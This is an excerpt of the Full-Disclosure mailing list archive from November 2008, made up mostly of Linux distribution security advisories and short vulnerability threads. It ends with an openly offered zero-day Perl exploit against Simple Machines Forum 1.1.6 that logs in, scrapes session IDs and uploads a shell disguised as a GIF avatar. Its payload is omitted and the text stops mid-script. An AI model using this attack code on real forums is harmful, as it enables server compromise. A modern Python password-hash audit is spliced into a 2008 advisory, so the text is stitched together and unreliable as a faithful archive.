2009.0/x86_64/opencbm-kernel-desktop-latest-0.4.2a-1.20081103.1mdv2008.1.x86_64.rpm cbaede32fa76450f078bb189bd22f026 
2009.0/x86_64/opencbm-kernel-server-latest-0.4.2a-1.20081103.1mdv2008.1.x86_64.rpm 3da3fc21d794a4325a1594ffe5602f03 2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.4-desktop-1mnb-1.5.8-1mdv2009.0.x86_64.rpm a3f2d334dbff55bffe9a90d01f412614 2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.4-server-1mnb-1.5.8-1mdv2009.0.x86_64.rpm f40cb8ea083591bfcdd969b76f88c530 2009.0/x86_64/ov51x-jpeg-kernel-desktop-latest-1.5.8-1.20081103.1mdv2009.0.x86_64.rpm e478caed49e01f39e102db014ac542bd 2009.0/x86_64/ov51x-jpeg-kernel-server-latest-1.5.8-1.20081103.1mdv2009.0.x86_64.rpm e522757aa731ac88295456b5566d61b4 2009.0/x86_64/qc-usb-kernel-2.6.27.4-desktop-1mnb-0.6.6-6mdv2009.0.x86_64.rpm 2f2d1a2663d8153ddffd0f0ffb12afa1 2009.0/x86_64/qc-usb-kernel-2.6.27.4-server-1mnb-0.6.6-6mdv2009.0.x86_64.rpm e5869f4d7b2fd99c063845c9a32f7bd6 2009.0/x86_64/qc-usb-kernel-desktop-latest-0.6.6-1.20081103.6mdv2009.0.x86_64.rpm cf9ab9f42b28b6ce14e046fdff66bf1d 2009.0/x86_64/qc-usb-kernel-server-latest-0.6.6-1.20081103.6mdv2009.0.x86_64.rpm 6d6e3c56aba0b8780ca1ffc55478e818 2009.0/x86_64/rt2860-kernel-2.6.27.4-desktop-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm 5dae92c188d824164ec11c07168c2b20 2009.0/x86_64/rt2860-kernel-2.6.27.4-server-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm 04ca954317a0cf92f2fcadd7ca021b81 2009.0/x86_64/rt2860-kernel-desktop-latest-1.7.0.0-1.20081103.2mdv2009.0.x86_64.rpm 20151fefd09ab6d9b4fc1a6461acd27b 2009.0/x86_64/rt2860-kernel-server-latest-1.7.0.0-1.20081103.2mdv2009.0.x86_64.rpm d458447ed4491b4a1340cbc493f17a96 2009.0/x86_64/rt2870-kernel-2.6.27.4-desktop-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm bf0d25daf284f15bec45cf2eac0474ac 2009.0/x86_64/rt2870-kernel-2.6.27.4-server-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm 1ee8da58af175e7f9c5b5a683deb2224 2009.0/x86_64/rt2870-kernel-desktop-latest-1.3.1.0-1.20081103.2mdv2009.0.x86_64.rpm 84eddcb8928d7d3f17e93b48dd450537 2009.0/x86_64/rt2870-kernel-server-latest-1.3.1.0-1.20081103.2mdv2009.0.x86_64.rpm ded3f3ad8dcb2d95ada249bffdc459af 
2009.0/x86_64/rtl8187se-kernel-2.6.27.4-desktop-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm a95bf4674b190345d168ba34a5315638 2009.0/x86_64/rtl8187se-kernel-2.6.27.4-server-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm 44e8a81fbbc523073be6b497c0aea70d 2009.0/x86_64/rtl8187se-kernel-desktop-latest-1016.20080716-1.20081103.1.1mdv2009.0.x86_64.rpm b15d9da2bcfcdc939b569eb3a26d6ad1 2009.0/x86_64/rtl8187se-kernel-server-latest-1016.20080716-1.20081103.1.1mdv2009.0.x86_64.rpm 252210488c17f5843ffc0c1811617f45 2009.0/x86_64/squashfs-lzma-kernel-2.6.27.4-desktop-1mnb-3.3-5mdv2009.0.x86_64.rpm d3efb5f053857de32eafb702c80e008b 2009.0/x86_64/squashfs-lzma-kernel-2.6.27.4-server-1mnb-3.3-5mdv2009.0.x86_64.rpm 3dc075354ee335acc04b0f28f9586dee 2009.0/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20081103.5mdv2009.0.x86_64.rpm 1cf9db1edb915488fb02841303b94902 2009.0/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20081103.5mdv2009.0.x86_64.rpm 49467f7f7c25ccff992614d33bc9a207 2009.0/x86_64/tp_smapi-kernel-2.6.27.4-desktop-1mnb-0.37-2mdv2009.0.x86_64.rpm b2a2f14e874055b0553380deee70f9c7 2009.0/x86_64/tp_smapi-kernel-2.6.27.4-server-1mnb-0.37-2mdv2009.0.x86_64.rpm b9a2506a07408440b6456186066b25c8 2009.0/x86_64/tp_smapi-kernel-desktop-latest-0.37-1.20081103.2mdv2009.0.x86_64.rpm 1606e9107ab19e3b1bc723cecb3a3a22 2009.0/x86_64/tp_smapi-kernel-server-latest-0.37-1.20081103.2mdv2009.0.x86_64.rpm 26eb20dd516fb56e5fc2bc85c468acb3 2009.0/x86_64/vboxadd-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm 281a1f616ae6ebfd1af79c69b4f8b77a 2009.0/x86_64/vboxadd-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm e57c22c163de7e938a66d1efd81663a5 2009.0/x86_64/vboxadd-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm 11c7c493aac70eec3e188d3574a078c0 2009.0/x86_64/vboxadd-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm a0f162518b8c04753ae4e785fd2978ac 2009.0/x86_64/vboxvfs-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm 1ed0653d5b54362b0d5fd888651e128a 
2009.0/x86_64/vboxvfs-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm d332d49cea0865a6e94273b0b14378fe 2009.0/x86_64/vboxvfs-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm 5b04b7459c3637356a55736a0cae9a0d 2009.0/x86_64/vboxvfs-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm 3943402f1e675768815e97c656a5e0d1 2009.0/x86_64/vhba-kernel-2.6.27.4-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm 7118d4a43026737ef9a0666ff0c9c7de 2009.0/x86_64/vhba-kernel-2.6.27.4-server-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm f8be2df68fdd9d17697b86b04309955b 2009.0/x86_64/vhba-kernel-desktop-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.x86_64.rpm 0c9e98c4338c3e400298b7f587295777 2009.0/x86_64/vhba-kernel-server-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.x86_64.rpm 5d9fd65787dd2f4dbc4b6d43da40a2f7 2009.0/x86_64/virtualbox-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm 5d5e884838fe2a0f6445148294cce0a5 2009.0/x86_64/virtualbox-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm dee1552ee9b94bd240bf628c00367ca7 2009.0/x86_64/virtualbox-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm b127c79624400cedb2b5997ada71b1ed 2009.0/x86_64/virtualbox-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm c5ad795c2bf9bf4700833186a03b177b 2009.0/x86_64/vpnclient-kernel-2.6.27.4-desktop-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm b6cec47d9766671067d622c25a0b21e9 2009.0/x86_64/vpnclient-kernel-2.6.27.4-server-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm dd166ad80893f23d91008810f4a25e94 2009.0/x86_64/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20081103.3mdv2009.0.x86_64.rpm baca1d77583f4a42f3c3fa322e87d978 2009.0/x86_64/vpnclient-kernel-server-latest-4.8.01.0640-1.20081103.3mdv2009.0.x86_64.rpm b154ea6c4d96dfa8e57773bd90ab7347 2009.0/SRPMS/kernel-2.6.27.4-1mnb2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. 
The verification of md5 checksums and GPG signatures is performed
automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From pinar at pardus.org.tr Wed Nov 5 06:46:38 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Wed, 05 Nov 2008 08:46:38 +0200
Subject: [Full-disclosure] [PLSA 2008-65] net-snmp: Denial of Service
Message-ID: <4911414E.2040900@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-65            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-05
  Severity: 2
      Type: Remote
------------------------------------------------------------------------

Summary
=======

A bug in the getbulk handling code could let anyone with even minimal
access crash the agent.

Description
===========

The getbulk code in net-snmp 5.4 before 5.4.2.1, 5.3 before 5.3.2.3, and
5.2 before 5.2.5.1 allows remote attackers to cause a denial of service
(crash) via vectors related to the number of responses or repeats.

Affected packages:

  Pardus 2008:
    net-snmp, all before 5.4.1-7-3
    net-snmptrap, all before 5.4.1-7-3

Resolution
==========

There are update(s) for net-snmp, net-snmptrap.
You can update them via Package Manager or with a single command from
console:

  pisi up net-snmp net-snmptrap

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8577
  * http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4309

------------------------------------------------------------------------

--
Pardus Security Team
http://security.pardus.org.tr

From pinar at pardus.org.tr Wed Nov 5 06:45:31 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Wed, 05 Nov 2008 08:45:31 +0200
Subject: [Full-disclosure] [PLSA 2008-62] Smarty: Security Bypass
Message-ID: <4911410B.1030907@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-62           security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-05
  Severity: 1
      Type: Remote
------------------------------------------------------------------------

Summary
=======

A vulnerability has been reported in Smarty, which can be exploited by
malicious people to bypass certain security restrictions.

Description
===========

The vulnerability is caused due to an error when processing data with
embedded variables. This can be exploited to potentially execute
arbitrary PHP code.

Affected packages:

  Pardus 2008:
    Smarty, all before 2.6.20-6-3

Resolution
==========

There are update(s) for Smarty.
You can update them via Package Manager or with a single command from
console:

  pisi up Smarty

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8567
  * http://code.google.com/p/smarty-php/source/diff?spec=svn2797&r=2797&format=side&path=/trunk/libs/Smarty_Compiler.class.php
  * http://smarty-php.googlecode.com/svn/trunk/NEWS

------------------------------------------------------------------------

--
Pardus Security Team
http://security.pardus.org.tr

From pinar at pardus.org.tr Wed Nov 5 06:44:35 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Wed, 05 Nov 2008 08:44:35 +0200
Subject: [Full-disclosure] [PLSA 2008-61] Ktorrent: Security Bypass
Message-ID: <491140D3.1040103@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-61           security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-05
  Severity: 1
      Type: Remote
------------------------------------------------------------------------

Summary
=======

Some vulnerabilities have been discovered in KTorrent, which can be
exploited by malicious users to compromise a vulnerable system and
malicious people to bypass certain security restrictions.

Description
===========

1) The web interface plugin does not properly restrict access to the
torrent upload functionality. This can be exploited to upload arbitrary
torrent files by sending specially crafted HTTP POST request to the
affected application.

2) The web interface plugin does not properly sanitise request
parameters before passing them to the PHP interpreter. This can be
exploited to inject and execute arbitrary PHP code by passing specially
crafted parameters to the PHP scripts of the web interface.

Successful exploitation of the vulnerabilities requires that the web
interface plugin is enabled (not the default setting).
Affected packages:

  Pardus 2008:
    ktorrent, all before 2.2.7-30-4

Resolution
==========

There are update(s) for ktorrent. You can update them via Package
Manager or with a single command from console:

  pisi up ktorrent

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8566
  * http://secunia.com/advisories/32442/

------------------------------------------------------------------------

--
Pardus Security Team
http://security.pardus.org.tr

From nytrokiss at gmail.com Wed Nov 5 08:30:02 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Wed, 5 Nov 2008 10:30:02 +0200
Subject: [Full-disclosure] Odays offers
In-Reply-To:
References: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk> <4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>
Message-ID: <8a6b8e350811050030l13881d56y96954e013a4f86fa@mail.gmail.com>

Test them against google and see if they work?

On Tue, Nov 4, 2008 at 11:54 PM, John Allison wrote:

> Why would a Whitehat want zone-h shutdown? That makes no sense at all.
>
> > Date: Tue, 4 Nov 2008 13:57:56 +0000
> > From: xploitable at gmail.com
> > To: full-disclosure at lists.grok.org.uk
> > Subject: Re: [Full-disclosure] Odays offers
> >
> > now maybe he should shut down his zone-h site as well and keep
> > whitehats happy :)
> >
> > On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois
> > wrote:
> > > sell 'em at wabisabilabi.
> > >
> > > ops, too late:
> > >
> > > http://www.techworld.com/security/news/index.cfm?newsID=106294
> > >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>

--
http://www.goldwatches.com/
http://www.jewelerslounge.com/

From kees at ubuntu.com Wed Nov 5 09:52:53 2008
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 5 Nov 2008 01:52:53 -0800
Subject: [Full-disclosure] [USN-662-1] Linux kernel vulnerabilities
Message-ID: <20081105095253.GO9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-662-1          November 05, 2008
linux vulnerability
CVE-2008-3528, CVE-2008-4395
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  linux-image-2.6.27-7-generic    2.6.27-7.16
  linux-image-2.6.27-7-server     2.6.27-7.16
  linux-image-2.6.27-7-virtual    2.6.27-7.16

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

It was discovered that the Linux kernel could be made to hang temporarily
when mounting corrupted ext2/3 filesystems. If a user were tricked into
mounting a specially crafted filesystem, a remote attacker could cause
system hangs, leading to a denial of service. (CVE-2008-3528)

Anders Kaseorg discovered that ndiswrapper did not correctly handle long
ESSIDs. For a system using ndiswrapper, a physically near-by attacker
could generate specially crafted wireless network traffic and execute
arbitrary code with root privileges.
(CVE-2008-4395)

Updated packages for Ubuntu 8.10:

From tribalmp at gmail.com Wed Nov 5 08:52:28 2008
From: tribalmp at gmail.com (Tribal MP)
Date: Wed, 5 Nov 2008 08:52:28 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
Message-ID: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>

AVG 8.0.173 flaw
Nov 5, 2008

-- Affected Vendors:
AVG Technologies

-- Affected Products:
AVG 8.0.173

-- Vulnerability Details:
There is a flaw in AVG 8.0 that allow a user to shutdown the AVG
Resident Shield Service via Task Manager temporarily and execute a
malicious file while the AVG Resident Shield Service is restarting.

Note: The AVG Resident Shield Service can be crashed, until next boot.

-- Difficulty Level:
low

-- Vendor Response:
None

-- Disclosure Timeline:
2008-11-05 - Disclosure

-- About:
Fabio Pinheiro at http://dicas3000.blogspot.com

From admin at cyber-threats.com Wed Nov 5 15:49:44 2008
From: admin at cyber-threats.com (alessandro telami)
Date: Wed, 5 Nov 2008 15:49:44 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
References: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
Message-ID:

What sort of vulnerability would this be???

> Date: Wed, 5 Nov 2008 08:52:28 +0000
> From: tribalmp at gmail.com
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] AVG 8.0.173 flaw
>
> AVG 8.0.173 flaw
> Nov 5, 2008
>
> -- Affected Vendors:
> AVG Technologies
>
> -- Affected Products:
> AVG 8.0.173
>
> -- Vulnerability Details:
> There is a flaw in AVG 8.0 that allow a user to shutdown the AVG
> Resident Shield Service via Task Manager temporarily and execute a
> malicious file while the AVG Resident Shield Service is restarting.
>
> Note: The AVG Resident Shield Service can be crashed, until next boot.
>
> -- Difficulty Level:
> low
>
> -- Vendor Response:
> None
>
> -- Disclosure Timeline:
> 2008-11-05 - Disclosure
>
> -- About:
> Fabio Pinheiro at http://dicas3000.blogspot.com
>

From eharrison at gmail.com Wed Nov 5 16:05:35 2008
From: eharrison at gmail.com (Erik Harrison)
Date: Wed, 5 Nov 2008 11:05:35 -0500
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To:
References: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
Message-ID:

leveraging the same access credentials and attack vector, an attacker
could shut down the affected system without authorization.

oh shit. time to patch!

On Wed, Nov 5, 2008 at 10:49 AM, alessandro telami wrote:
> What sort of vulnerability would this be???
>
>> Date: Wed, 5 Nov 2008 08:52:28 +0000
>> From: tribalmp at gmail.com
>> To: full-disclosure at lists.grok.org.uk
>> Subject: [Full-disclosure] AVG 8.0.173 flaw
>>
>> AVG 8.0.173 flaw
>> Nov 5, 2008
>>
>> -- Affected Vendors:
>> AVG Technologies
>>
>> -- Affected Products:
>> AVG 8.0.173
>>
>> -- Vulnerability Details:
>> There is a flaw in AVG 8.0 that allow a user to shutdown the AVG
>> Resident Shield Service via Task Manager temporarily and execute a
>> malicious file while the AVG Resident Shield Service is restarting.
>>
>> Note: The AVG Resident Shield Service can be crashed, until next boot.
>>
>> -- Difficulty Level:
>> low
>>
>> -- Vendor Response:
>> None
>>
>> -- Disclosure Timeline:
>> 2008-11-05 - Disclosure
>>
>> -- About:
>> Fabio Pinheiro at http://dicas3000.blogspot.com
>>
>

From kees at ubuntu.com Wed Nov 5 18:19:56 2008
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 5 Nov 2008 10:19:56 -0800
Subject: [Full-disclosure] [USN-663-1] system-tools-backends regression
Message-ID: <20081105181956.GP9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-663-1          November 05, 2008
system-tools-backends regression
https://launchpad.net/bugs/287134
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  system-tools-backends           2.6.0-1ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that passwords changed (or new users created) via the
"Users and Groups" tool were created with 3DES hashing. This reduced
the security of stored user passwords, and was a regression from the
correct MD5 hashing. This update fixes the problem; future password
changes will correct the hashing used. We apologize for the
inconvenience.

Updated packages for Ubuntu 8.10:
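
The USN-663-1 notice above says that only future password changes correct the hashing, so a password set while the regressed package was installed keeps its weak hash until it is changed again. The audit below is an added example, not part of the notice or of Ubuntu's tooling: it lists such accounts from shadow-format lines, assuming the weak hashes are stored in the traditional 13-character DES crypt(3) form with no `$id$` prefix. The function names and the sample entries are constructed for illustration.

```python
import re
import sys
from datetime import date, timedelta

# crypt(3) "$id$" prefixes and the scheme each one names.
CRYPT_IDS = {"1": "md5", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256", "6": "sha512"}
ID_RE = re.compile(r"\$([0-9a-z]+)\$")
# Assumption: traditional DES crypt(3) = 2 salt chars + 11 hash chars, no "$".
DES_RE = re.compile(r"[./0-9A-Za-z]{13}")

# Constructed sample in /etc/shadow layout (the hashes are not real).
SAMPLE_SHADOW = """\
root:!:14188:0:99999:7:::
daemon:*:14175:0:99999:7:::
alice:$1$c0nstruc$AAAAAAAAAAAAAAAAAAAAAA:14185:0:99999:7:::
bob:ab01FAX.bQRSU:14188:0:99999:7:::
carol:!ab01FAX.bQRSU:14188:0:99999:7:::
dave::14188:0:99999:7:::
erin:$6$c0nstruc$BBBBBBBBBBBBBBBBBBBBBB:14190:0:99999:7:::
"""


def classify_hash(field):
    """Return (scheme, locked) for the password field of a shadow entry."""
    locked = field.startswith("!")      # "!" prefix = password login locked
    body = field.lstrip("!")
    if body == "":
        # "" means no password at all; "!" alone means no usable password.
        return ("none" if locked else "empty", locked)
    if body == "*":
        return ("none", locked)
    match = ID_RE.match(body)
    if match:
        return (CRYPT_IDS.get(match.group(1), "unknown"), locked)
    if DES_RE.fullmatch(body):
        return ("des", locked)
    return ("unknown", locked)


def audit_shadow(lines):
    """List accounts whose stored hash is DES crypt and needs a reset."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 3:
            continue                    # malformed entry, nothing to classify
        user, field, lastchg = parts[0], parts[1], parts[2]
        scheme, locked = classify_hash(field)
        if scheme != "des":
            continue
        # Field 3 is the last password change in days since 1970-01-01.
        changed = None
        if lastchg.isdigit():
            changed = date(1970, 1, 1) + timedelta(days=int(lastchg))
        findings.append({"user": user, "locked": locked,
                         "last_change": changed})
    return findings


if __name__ == "__main__":
    # With a path argument, audit that file (reading /etc/shadow needs root);
    # without one, run on the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as handle:
            entries = handle.readlines()
    else:
        entries = SAMPLE_SHADOW.splitlines()
    for item in audit_shadow(entries):
        state = "locked" if item["locked"] else "active"
        print(f'{item["user"]}: DES crypt hash, {state}, '
              f'last changed {item["last_change"]}')
```

A locked account is still reported because unlocking it restores the weak hash; each listed account needs a password change after the fixed package is installed.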

From nytrokiss at gmail.com Wed Nov 5 20:12:45 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Wed, 5 Nov 2008 22:12:45 +0200
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To:
References: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
Message-ID: <8a6b8e350811051212i6900029pbd823bf6578eaa18@mail.gmail.com>

For all people that use the free AVG "you get what you paid for" for all
else........

On Wed, Nov 5, 2008 at 6:05 PM, Erik Harrison wrote:

> leveraging the same access credentials and attack vector, an attacker
> could shut down the affected system without authorization.
>
> oh shit. time to patch!
>
> On Wed, Nov 5, 2008 at 10:49 AM, alessandro telami
> wrote:
> > What sort of vulnerability would this be???
> >
> >> Date: Wed, 5 Nov 2008 08:52:28 +0000
> >> From: tribalmp at gmail.com
> >> To: full-disclosure at lists.grok.org.uk
> >> Subject: [Full-disclosure] AVG 8.0.173 flaw
> >>
> >> AVG 8.0.173 flaw
> >> Nov 5, 2008
> >>
> >> -- Affected Vendors:
> >> AVG Technologies
> >>
> >> -- Affected Products:
> >> AVG 8.0.173
> >>
> >> -- Vulnerability Details:
> >> There is a flaw in AVG 8.0 that allow a user to shutdown the AVG
> >> Resident Shield Service via Task Manager temporarily and execute a
> >> malicious file while the AVG Resident Shield Service is restarting.
> >>
> >> Note: The AVG Resident Shield Service can be crashed, until next boot.
> >>
> >> -- Difficulty Level:
> >> low
> >>
> >> -- Vendor Response:
> >> None
> >>
> >> -- Disclosure Timeline:
> >> 2008-11-05 - Disclosure
> >>
> >> -- About:
> >> Fabio Pinheiro at http://dicas3000.blogspot.com
> >>
> >
>

--
http://www.goldwatches.com/
http://www.jewelerslounge.com/

From security at mandriva.com Wed Nov 5 20:30:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 05 Nov 2008 13:30:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:225 ] net-snmp
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:225
http://www.mandriva.com/security/
_______________________________________________________________________

Package : net-snmp
Date    : November 5, 2008
Affected: 2008.0, 2008.1, 2009.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

A denial of service vulnerability was discovered in how Net-SNMP
processed GETBULK requests. A remote attacker with read access to
the SNMP server could issue a specially-crafted request which would
cause snmpd to crash (CVE-2008-4309).

Please note that for this to be successfully exploited, an attacker
must have read access to the SNMP server.
By default, the public community name grants read-only access,
however it is recommended that the default community name be changed
in production.

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4309
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJEdTsmqjQ0CJFipgRAk0yAJ91M1kRkgQqJovhGgIaofqwrLlWQgCglLwu
8ZyyTGYX15oaOsh4j4Mq4AU=
=qPXg
-----END PGP SIGNATURE-----

From debasis.mohanty.listmails at gmail.com Wed Nov 5 23:27:09 2008
From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty)
Date: Thu, 6 Nov 2008 04:57:09 +0530
Subject: [Full-disclosure] Adobe Reader Javascript Printf Buffer Overflow [ZeroDay] Exploit
Message-ID: <49122bd1.09876e0a.6400.ffffbee6@mx.google.com>

Since past few weeks I was busy forking adobe stuffs, it didn't took me more than few hours to come up with this exploit. Thanks to coresecurity folks for their technical details which made my job easy.

Grab it here...
http://hackingspirits.com/vuln-rnd/vuln-rnd.html

-d

www.coffeeandsecurity.com
www.hackingspirits.com

From elmysterio at hushmail.com Thu Nov 6 03:55:57 2008
From: elmysterio at hushmail.com (elmysterio at hushmail.com)
Date: Wed, 05 Nov 2008 22:55:57 -0500
Subject: [Full-disclosure] No subject
Message-ID: <20081106035557.B21D82803B@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ANOTHER SMF Code Execution 0day!? Good Lord...

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure, it never stops.
#
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
#     -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd at win32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd at win32]$
#
# FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new(
    cookie_jar => {},
    agent      => "Mozilla FireFox"
);

my %parms = (
    s => "",
    d => 0,
    x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
    u => "Gl0ria!!!",
    p => "gl0ria\@herb3st"
);

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
    die < [-s] Site -> http://site.com/forums
    [-x] Proxy -> localhost:8118
    [-u] Username -> Gl0ria!!!
    [-p] Password -> gl0ria\@herb3st
    [-d] Debug
HELP
}

my $shell = "";     # payload bytes omitted
$shell .= <<'EXIF';
EXIF
$shell .= "";       # payload bytes omitted

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2", [
    user         => $parms{u},
    passwrd      => $parms{p},
    cookielength => -1
]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
    unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;
die "[!!] Error getting session id\n"
    unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;
die "[!!] Error getting id\n"
    unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}",
    SERVER_INFO => "echo expl0ited");
&shell if $ret->as_string =~ /expl0ited/;

$ret = $ua->request( POST "$parms{s}/index.php?action=profile2",
    Content_Type => 'multipart/form-data',
    Content => [
        avatar_choice => "upload",
        sc            => $sid,
        userID        => $id,
        sa            => "forumProfile",
        attachment    => [ undef, "expl0ited.gif", Content => $shell, "Content-Type" => "image/gif" ]
    ]);

## Updating Settings.php
